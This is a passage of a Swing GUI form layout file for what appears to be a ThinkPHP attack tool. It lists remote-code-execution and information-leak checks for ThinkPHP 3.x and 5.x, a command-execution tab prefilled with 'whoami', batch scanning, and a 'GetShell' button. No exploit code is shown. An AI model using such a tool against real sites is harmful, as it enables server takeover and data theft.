5.0 RCE" 33 | addElement( "ThinkPHP 5.0 RCE" ) 34 | addElement( "ThinkPHP 5.0.10 RCE" ) 35 | addElement( "ThinkPHP 5.0.22/5.1.29 RCE" ) 36 | addElement( "ThinkPHP 5.0.23 RCE" ) 37 | addElement( "ThinkPHP 5.0.24-5.1.30 RCE" ) 38 | addElement( "ThinkPHP 5.x 数据库信息泄露" ) 39 | addElement( "ThinkPHP 5.x 日志泄露" ) 40 | addElement( "ThinkPHP 3.x RCE" ) 41 | addElement( "ThinkPHP 3.x 日志泄露" ) 42 | addElement( "ThinkPHP 3.x Log RCE" ) 43 | addElement( "ALL" ) 44 | } 45 | } ) 46 | add( new FormComponent( "javax.swing.JTextArea" ) { 47 | name: "textArea1" 48 | } ) 49 | add( new FormComponent( "javax.swing.JButton" ) { 50 | name: "clear_btn" 51 | "text": "Clear" 52 | } ) 53 | add( new FormContainer( "javax.swing.JTabbedPane", new FormLayoutManager( class javax.swing.JTabbedPane ) ) { 54 | name: "tabbedPane1" 55 | add( new FormContainer( "javax.swing.JPanel", new FormLayoutManager( class org.jdesktop.layout.GroupLayout ) { 56 | "$horizontalGroup": "par l {comp scrollPane1::l::801:x}" 57 | "$verticalGroup": "par l {comp scrollPane1::l::481:x}" 58 | } ) { 59 | name: "panel1" 60 | add( new FormContainer( "javax.swing.JScrollPane", new FormLayoutManager( class javax.swing.JScrollPane ) ) { 61 | name: "scrollPane1" 62 | add( new FormComponent( "javax.swing.JTextArea" ) { 63 | name: "infores_txt" 64 | } ) 65 | } ) 66 | }, new FormLayoutConstraints( null ) { 67 | "title": "信息" 68 | } ) 69 | add( new FormContainer( "javax.swing.JPanel", new FormLayoutManager( class org.jdesktop.layout.GroupLayout ) { 70 | "$horizontalGroup": "par l {seq l {space :::p, comp label4:::p:35:p, space :::p, comp cmd_txt:::p:537:p, space :p:34:p, comp fun_btn:::p::p, space ::105:x}, comp scrollPane2::l::801:x}" 71 | "$verticalGroup": "par l {seq l {par b {comp label4::b:p:39:p, comp cmd_txt::b:p::p, comp fun_btn::b:p::p}, space :::p, comp scrollPane2::::436:x}}" 72 | } ) { 73 | name: "panel2" 74 | add( new FormComponent( "javax.swing.JLabel" ) { 75 | name: "label4" 76 | "text": "CMD:" 77 | } ) 78 | add( new FormComponent( "javax.swing.JTextField" ) { 79 | name: "cmd_txt" 80 | "text": "whoami" 81 | } ) 82 | add( new FormComponent( "javax.swing.JButton" ) { 83 | name: "fun_btn" 84 | "text": "执行" 85 | } ) 86 | add( new FormContainer( "javax.swing.JScrollPane", new FormLayoutManager( class javax.swing.JScrollPane ) ) { 87 | name: "scrollPane2" 88 | add( new FormComponent( "javax.swing.JTextArea" ) { 89 | name: "cmdres_txt" 90 | } ) 91 | } ) 92 | }, new FormLayoutConstraints( null ) { 93 | "title": "命令执行" 94 | } ) 95 | } ) 96 | add( new FormComponent( "javax.swing.JLabel" ) { 97 | name: "label3" 98 | "text": "路径:" 99 | } ) 100 | add( new FormComponent( "javax.swing.JTextField" ) { 101 | name: "file_txt" 102 | } ) 103 | add( new FormComponent( "javax.swing.JButton" ) { 104 | name: "import_btn" 105 | "text": "导入" 106 | } ) 107 | add( new FormComponent( "javax.swing.JButton" ) { 108 | name: "batch_test_btn" 109 | "text": "批量检测" 110 | } ) 111 | add( new FormComponent( "javax.swing.JButton" ) { 112 | name: "getshell_btn" 113 | "text": "GetSehll" 114 | } ) 115 | }, new FormLayoutConstraints( null ) { 116 | "location": new java.awt.Point( 45, 10 ) 117 | "size": new java.awt.Dimension( 870, 675 ) 118 | } ) 119 | } 120 | } 121 | --------------------------------------------------------------------------------